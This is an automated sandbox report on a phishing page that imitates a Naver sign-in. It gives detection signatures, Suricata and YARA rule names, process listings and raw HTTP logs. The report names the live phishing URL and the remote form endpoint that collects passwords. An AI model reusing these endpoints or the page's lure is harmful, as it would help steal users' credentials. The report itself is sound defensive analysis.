Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://heuristic-knuth-588d37.netlify.app/?naps/

Overview

General Information

Sample URL:https://heuristic-knuth-588d37.netlify.app/?naps/
Analysis ID:1589350
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish10
AI detected suspicious Javascript
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Suspicious form URL found

Classification

  • System is w10x64
  • chrome.exe (PID: 6056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1900,i,12343564241610681806,8701581686100418049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 2140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://heuristic-knuth-588d37.netlify.app/?naps/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_103JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-12T01:32:55.475521+010020325152Possible Social Engineering Attempted3.125.36.175443192.168.2.549714TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-12T01:32:55.475521+010020325142Possible Social Engineering Attempted3.125.36.175443192.168.2.549714TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://heuristic-knuth-588d37.netlify.app/?naps/Avira URL Cloud: detection malicious, Label: phishing
      Source: https://essentialhandymanservices.com/wp/next.phpAvira URL Cloud: Label: malware

      Phishing

      barindex
      Source: https://heuristic-knuth-588d37.netlify.app/?naps/Joe Sandbox AI: Score: 9 Reasons: The brand 'Naver' is a well-known South Korean online platform., The legitimate domain for Naver is 'naver.com'., The URL 'heuristic-knuth-588d37.netlify.app' does not match the legitimate domain for Naver., The URL is hosted on 'netlify.app', which is a platform for deploying web applications and not directly associated with Naver., The use of a generic subdomain pattern 'heuristic-knuth-588d37' is typical for automatically generated URLs on hosting platforms and is not indicative of a legitimate Naver site., Presence of input fields for 'Username' and 'Password' on a non-legitimate domain increases the risk of phishing. DOM: 1.0.pages.csv
      Source: Yara matchFile source: 1.0.pages.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_103, type: DROPPED
      Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://heuristic-knuth-588d37.netlify.app/?naps/... The script demonstrates several high-risk behaviors, including data exfiltration, redirects to potentially malicious domains, and the use of obfuscated code. While some of the behaviors may be intended for legitimate purposes, such as analytics or error reporting, the overall implementation and lack of transparency raise significant security concerns.
      Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: http://www.xay.io/... The provided JavaScript snippet exhibits several high-risk behaviors, including data exfiltration, redirects to potentially malicious domains, and the use of obfuscated code. While some contextual factors, such as the use of analytics-related functionality, may suggest a legitimate purpose, the overall behavior of the script is concerning and requires further investigation.
      Source: https://heuristic-knuth-588d37.netlify.app/?naps/HTTP Parser: Form action: https://essentialhandymanservices.com/wp/next.php netlify essentialhandymanservices
      Source: https://heuristic-knuth-588d37.netlify.app/?naps/HTTP Parser: Number of links: 0
      Source: http://www.xay.io/HTTP Parser: Base64 decoded: <svg fill='#D7D7D7' style="float: right" xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>
      Source: https://heuristic-knuth-588d37.netlify.app/?naps/HTTP Parser: Title: -Naver Sign in does not match URL
      Source: https://heuristic-knuth-588d37.netlify.app/?naps/HTTP Parser: Form action: https://essentialhandymanservices.com/wp/next.php
      Source: https://heuristic-knuth-588d37.netlify.app/?naps/HTTP Parser: <input type="password" .../> found
      Source: http://www.xay.io/HTTP Parser: No favicon
      Source: http://www.xay.io/HTTP Parser: No favicon
      Source: http://www.xay.io/HTTP Parser: No favicon
      Source: http://www.xay.io/HTTP Parser: No favicon
      Source: http://www.xay.io/HTTP Parser: No favicon
      Source: http://www.xay.io/privacy.htmlHTTP Parser: No favicon
      Source: https://heuristic-knuth-588d37.netlify.app/?naps/HTTP Parser: No <meta name="author".. found
      Source: https://heuristic-knuth-588d37.netlify.app/?naps/HTTP Parser: No <meta name="copyright".. found
      Source: Network trafficSuricata IDS: 2032514 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 3.125.36.175:443 -> 192.168.2.5:49714
      Source: Network trafficSuricata IDS: 2032515 - Severity 2 - ET PHISHING Generic Multibrand Ajax XHR CredPost Phishing Landing : 3.125.36.175:443 -> 192.168.2.5:49714
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /?naps/ HTTP/1.1Host: heuristic-knuth-588d37.netlify.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://heuristic-knuth-588d37.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /g1U1hqo.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://heuristic-knuth-588d37.netlify.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /g1U1hqo.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon_1024.png HTTP/1.1Host: nid.naver.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /tr/mainsite2023/navbar-logo-dark-2023.png HTTP/1.1Host: www.dynadot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /sxp/i/c4601e5f6cdd73216cafdd5af209201c.js HTTP/1.1Host: euob.netgreencolumn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?abp=1&adsdeli=true HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /tr/mainsite2023/navbar-logo-dark-2023.png HTTP/1.1Host: www.dynadot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /sxp/i/c4601e5f6cdd73216cafdd5af209201c.js HTTP/1.1Host: euob.netgreencolumn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?abp=1&adsdeli=true HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ct?id=77721&url=http%3A%2F%2Fwww.xay.io%2F&sf=0&tpi=&ch=landingpage&uvid=23281&tsf=0&tsfmi=&tsfu=&cb=1736641999892&hl=1&op=0&ag=300509663&rand=94158160962179265907110092789080717119000882265890071078272689702602859010811966965280&fs=1280x907&fst=1280x907&np=win32&nv=google%20inc.&ref=&ss=1280x1024&nc=0&at=&di=W1siZWYiLDkzNjVdLFsiYWJuY2giLDI1XSxbLTEsIi0iXSxbLTE0LCItIl0sWy0yMSwiLSJdLFstMjksIi0iXSxbLTQxLCItIl0sWy00NCwiMCwwLDAsNSJdLFstNDYsIjAiXSxbLTU4LCItIl0sWy00LCItIl0sWy0yMCwiLSJdLFstMjYsIntcInRqaHNcIjo4NTgwMDI0LFwidWpoc1wiOjQ0MzM0NDQsXCJqaHNsXCI6MjE3MjY0OTQ3Mn0iXSxbLTI4LCJlbi1VUyxlbiJdLFstNjAsMjAxXSxbLTYzLCItIl0sWy02NSwiLSJdLFstMTksIlswLDAsMCwwLDAsMCwxLDI0LDI0LFwiLVwiLDEyODAsOTg0LDEyODAsMTAyNCwxMjgwLDk4NCwxMjgwLDkwNywwLDAsMCwwLFwiLVwiLFwiLVwiLDEyODAsOTA3LG51bGxdIl0sWy0yMiwiW1wiblwiLFwiblwiXSJdLFstNDksIi0iXSxbLTE1LCItIl0sWy0xNiwiMCJdLFstMzUsIlsxNzM2NjQxOTk5NTcxLDVdIl0sWy01MCwiLSJdLFstNjQsIi0iXSxbLTIsIjI1LGQ0SE9YVlBYN2ZOak5iMUt1N2NXOWdURzgydlFWSTZBbTlneUZBQWlIa1R5REJmTW1YWGlpcGhFRG94Y2IwRmpDWTBBM0dOdURlSkZkWlhkb3k1VzMvNTg1cXBiVXc1Y3RQZnYiXSxbLTYsIntcIndcIjpbXCIwXCIsXCJ0Y2Jsb2NrXCIsXCJzZWFyY2hib3hCbG9ja1wiLFwiZ2V0WE1MaHR0cFwiLFwiYWpheFF1ZXJ5XCIsXCJhamF4QmFja2ZpbGxcIixcImxvYWRGZWVkXCIsXCJ4bWxIdHRwXCIsXCJsc1wiLFwiZ2V0TG9hZEZlZWRBcmd1bWVudHNcIixcIl9fY3RjZ19jdF83NzcyMV9leGVjXCJdLFwiblwiOltdLFwiZFwiOltdfSJdLFstOSwiKyJdLFstMTAsIi0iXSxbLTM5LCJbXCIyMDAzMDEwN1wiLDIsXCJHZWNrb1wiLFwiTmV0c2NhcGVcIixcIk1vemlsbGFcIixudWxsLG51bGwsZmFsc2UsbnVsbCxmYWxzZSxudWxsLDUsdHJ1ZSxmYWxzZSxudWxsLDAsZmFsc2UsZmFsc2VdIl0sWy01NSwiMCJdLFstNTksImRlbmllZCJdLFstNjcsIi0iXSxbLTgsIi0iXSxbLTI0LCJbXSJdLFstNDMsIjAwMDAwMDAxMDEwMDAwMDEwMDAxMTAxMTAxMDAxMTAxMDAwMDAxMCJdLFstNTIsIi0iXSxbLTU0LCJ7XCJoXCI6W1wiMzI5OTcyODQ1MlwiLFwiODIyODIzMTE5XCIsXCJfM1wiLFwiMjg3Mjg5OTMyMFwiXSxcImRcIjpbXSxcImJcIjpbXCJfMFwiLFwiMjY0NjAzODgyXCJdLFwic1wiOjF9Il0sWy02NiwiZ2VvbG9jYXRpb24sc3RvcmFnZWFjY2VzcyxnYW1lcGFkLGNoZWN0LG1pZGksZGlzcGxheWNhcHR1cmUsdXNiLGJyb3dzaW5ndG9waWNzLGxvY2FsZm9udHMscGljdHVyZWlucGljdHVyZSxqb2luYWRpbnRlcmVzdGdyb3VwLHB1YmxpY2tleWNyZWRlbnRpYWxzZ2V0LG90cGNyZWRlbnRpYWxzLGNodWFmb3JtZmFjdG9yLGVuY3J5cHRlZG1lZGlhLGNoc2F2ZWRhdGEsY2h1YWZ1bGx2ZXJzaW9ubGlzdCxjaHVhd293NjQsc2hhcmVkc3RvcmFnZSxjaGRvd25saW5rLGNocHJlZmVyc2NvbG9yc2NoZW1lLHN5bmN4aHIsY2h1YW1vZGVsLHNlcmlhbCxjYW1lcmEsY2hwcmVmZXJzcmVkdWNlZG1vdGlvbixwcml2YXRlc3RhdGV0b2tlbmlzc3VhbmNlLGJsdWV0b290aCxpZGVudGl0eWNyZWRlbnRpYWxzZ2V0LGNodWFmdWxsdmVyc2lvbixmdWxsc2NyZWVuLGNoZHByLHVubG9hZCxrZXlib2FyZG1hcCxjaHVhcGxhdGZvcm0sc2hhcmVkc3RvcmFnZXNlbGVjdHVybCxneXJvc2NvcGUsaW50ZXJlc3Rjb2hvcnQsd2luZG93cGxhY2VtZW50LGNodWFtb2JpbGUsY2h1YSxydW5hZGF1Y3Rpb24sbWFnbmV0b21ldGVyLGFjY2VsZXJvbWV0ZXIscHJpdmF0ZXN0YXRldG9rZW5yZWRlbXB0aW9uLGNodWFhcmNoLHhyc3BhdGlhbHRyYWNraW5nLGlkbGVkZXRlY3Rpb24sY2h1YXBsYXRmb3JtdmVyc2lvbixjaHdpZHRoLGNsaXBib2FyZHJlYWQsY2h2aWV3cG9ydHdpZHRoLHBheW1lbnQsY2h2aWV3cG9ydGhlaWdodCxjaHJ0dCxhdXRvcGxheSxjcm9zc29yaWdpbmlzb2xhdGVkLGhpZCxjaHVhYml0bmVzcyxzY3JlZW53YWtlbG9jayxwcml2YXRlYWdncmVnYXRpb24sY2xpcGJvYXJkd3JpdGUsYXR0cmlidXRpb25yZXBvcnRpbmcsY2hkZXZpY2VtZW1vcnksbWljcm9waG9u
      Source: global trafficHTTP traffic detected: GET /tracker/tc_imp.gif?e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07f52a13ad2a24710d14e681f2d1586d31c64e56ac8bf88b71208fe59f1d329e921c46bcf40e25c7ea8290ee95c400035db386ee683e99332bd06b442c316f0496f70bfc72f02431e24f97999c140ab51258fc6e279126332a5de6c7fd6d5431f2b436f0715a7902c701e56f2ab0b2093aef6298ee35d60013ee9f3e4869265bcd5d759bf079d5d3a63ccea9de6f13599d9b13a93350983f0c82a1e1ea3683aba8c063abbcaf1778807fc4eae965d8013d9c56d9c7c71d69338c722d795f6bbdea6fd4075e93daaa9ae7c433ebdcf71d2e113f01a1813dd405c85d0cd88c0bcdd70ff1b90d0f58838b62f3574937b6bccc2df0e37d7ec74bb11e0830dce37ef33024a5e8c6eff03dfcba874b4822ac419e0cf929b6b8d4d4f68fe481f5e72092687a023fa05d1cfa62aae9969ebbb2a9adaa9b13dc1f0e35f477083ee5252f0b1490242bbacac74e66688e037f2e62eb211bc23c1168d40c5a22ec60426e3ad94603b3e690a23151442d998e82c927cb20030067f83c50acd840a4fbbe18ba8b67ec3f3e5fb85fea9f54a4635f259c4d5212bf40a3b7aac090b3b04910df76405d0af843ade72dd378ab52dcabb0b9f7f0e28290b624df49f9bd9760326f969229d87dbc7c1d84f17dcf0eb6f9ca41e67ca9056657bf391c54475e663d423c049b27bc24d85aa46afe36dbc8982d0845536baa229699f70a68dacb956c13d261c05887a030de4e14d85f112ca9987da1490c595390e2b55e17ef854b85fb29d7bc971107403287762e75a8e9d210afa3c82b5ff35c5dd14da2161a510603eceabc30059ed74f392028344484038e0647fd9f6893fd95d68cbd950f492&cri=S9cmgKYQSv&ts=1155&cb=1736642001047 HTTP/1.1Host: obseu.netgreencolumn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://www.xay.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
      Source: global trafficHTTP traffic detected: GET /ct?id=77721&url=http%3A%2F%2Fwww.xay.io%2F&sf=0&tpi=&ch=landingpage&uvid=23281&tsf=0&tsfmi=&tsfu=&cb=1736641999892&hl=1&op=0&ag=300509663&rand=94158160962179265907110092789080717119000882265890071078272689702602859010811966965280&fs=1280x907&fst=1280x907&np=win32&nv=google%20inc.&ref=&ss=1280x1024&nc=0&at=&di=W1siZWYiLDkzNjVdLFsiYWJuY2giLDI1XSxbLTEsIi0iXSxbLTE0LCItIl0sWy0yMSwiLSJdLFstMjksIi0iXSxbLTQxLCItIl0sWy00NCwiMCwwLDAsNSJdLFstNDYsIjAiXSxbLTU4LCItIl0sWy00LCItIl0sWy0yMCwiLSJdLFstMjYsIntcInRqaHNcIjo4NTgwMDI0LFwidWpoc1wiOjQ0MzM0NDQsXCJqaHNsXCI6MjE3MjY0OTQ3Mn0iXSxbLTI4LCJlbi1VUyxlbiJdLFstNjAsMjAxXSxbLTYzLCItIl0sWy02NSwiLSJdLFstMTksIlswLDAsMCwwLDAsMCwxLDI0LDI0LFwiLVwiLDEyODAsOTg0LDEyODAsMTAyNCwxMjgwLDk4NCwxMjgwLDkwNywwLDAsMCwwLFwiLVwiLFwiLVwiLDEyODAsOTA3LG51bGxdIl0sWy0yMiwiW1wiblwiLFwiblwiXSJdLFstNDksIi0iXSxbLTE1LCItIl0sWy0xNiwiMCJdLFstMzUsIlsxNzM2NjQxOTk5NTcxLDVdIl0sWy01MCwiLSJdLFstNjQsIi0iXSxbLTIsIjI1LGQ0SE9YVlBYN2ZOak5iMUt1N2NXOWdURzgydlFWSTZBbTlneUZBQWlIa1R5REJmTW1YWGlpcGhFRG94Y2IwRmpDWTBBM0dOdURlSkZkWlhkb3k1VzMvNTg1cXBiVXc1Y3RQZnYiXSxbLTYsIntcIndcIjpbXCIwXCIsXCJ0Y2Jsb2NrXCIsXCJzZWFyY2hib3hCbG9ja1wiLFwiZ2V0WE1MaHR0cFwiLFwiYWpheFF1ZXJ5XCIsXCJhamF4QmFja2ZpbGxcIixcImxvYWRGZWVkXCIsXCJ4bWxIdHRwXCIsXCJsc1wiLFwiZ2V0TG9hZEZlZWRBcmd1bWVudHNcIixcIl9fY3RjZ19jdF83NzcyMV9leGVjXCJdLFwiblwiOltdLFwiZFwiOltdfSJdLFstOSwiKyJdLFstMTAsIi0iXSxbLTM5LCJbXCIyMDAzMDEwN1wiLDIsXCJHZWNrb1wiLFwiTmV0c2NhcGVcIixcIk1vemlsbGFcIixudWxsLG51bGwsZmFsc2UsbnVsbCxmYWxzZSxudWxsLDUsdHJ1ZSxmYWxzZSxudWxsLDAsZmFsc2UsZmFsc2VdIl0sWy01NSwiMCJdLFstNTksImRlbmllZCJdLFstNjcsIi0iXSxbLTgsIi0iXSxbLTI0LCJbXSJdLFstNDMsIjAwMDAwMDAxMDEwMDAwMDEwMDAxMTAxMTAxMDAxMTAxMDAwMDAxMCJdLFstNTIsIi0iXSxbLTU0LCJ7XCJoXCI6W1wiMzI5OTcyODQ1MlwiLFwiODIyODIzMTE5XCIsXCJfM1wiLFwiMjg3Mjg5OTMyMFwiXSxcImRcIjpbXSxcImJcIjpbXCJfMFwiLFwiMjY0NjAzODgyXCJdLFwic1wiOjF9Il0sWy02NiwiZ2VvbG9jYXRpb24sc3RvcmFnZWFjY2VzcyxnYW1lcGFkLGNoZWN0LG1pZGksZGlzcGxheWNhcHR1cmUsdXNiLGJyb3dzaW5ndG9waWNzLGxvY2FsZm9udHMscGljdHVyZWlucGljdHVyZSxqb2luYWRpbnRlcmVzdGdyb3VwLHB1YmxpY2tleWNyZWRlbnRpYWxzZ2V0LG90cGNyZWRlbnRpYWxzLGNodWFmb3JtZmFjdG9yLGVuY3J5cHRlZG1lZGlhLGNoc2F2ZWRhdGEsY2h1YWZ1bGx2ZXJzaW9ubGlzdCxjaHVhd293NjQsc2hhcmVkc3RvcmFnZSxjaGRvd25saW5rLGNocHJlZmVyc2NvbG9yc2NoZW1lLHN5bmN4aHIsY2h1YW1vZGVsLHNlcmlhbCxjYW1lcmEsY2hwcmVmZXJzcmVkdWNlZG1vdGlvbixwcml2YXRlc3RhdGV0b2tlbmlzc3VhbmNlLGJsdWV0b290aCxpZGVudGl0eWNyZWRlbnRpYWxzZ2V0LGNodWFmdWxsdmVyc2lvbixmdWxsc2NyZWVuLGNoZHByLHVubG9hZCxrZXlib2FyZG1hcCxjaHVhcGxhdGZvcm0sc2hhcmVkc3RvcmFnZXNlbGVjdHVybCxneXJvc2NvcGUsaW50ZXJlc3Rjb2hvcnQsd2luZG93cGxhY2VtZW50LGNodWFtb2JpbGUsY2h1YSxydW5hZGF1Y3Rpb24sbWFnbmV0b21ldGVyLGFjY2VsZXJvbWV0ZXIscHJpdmF0ZXN0YXRldG9rZW5yZWRlbXB0aW9uLGNodWFhcmNoLHhyc3BhdGlhbHRyYWNraW5nLGlkbGVkZXRlY3Rpb24sY2h1YXBsYXRmb3JtdmVyc2lvbixjaHdpZHRoLGNsaXBib2FyZHJlYWQsY2h2aWV3cG9ydHdpZHRoLHBheW1lbnQsY2h2aWV3cG9ydGhlaWdodCxjaHJ0dCxhdXRvcGxheSxjcm9zc29yaWdpbmlzb2xhdGVkLGhpZCxjaHVhYml0bmVzcyxzY3JlZW53YWtlbG9jayxwcml2YXRlYWdncmVnYXRpb24sY2xpcGJvYXJkd3JpdGUsYXR0cmlidXRp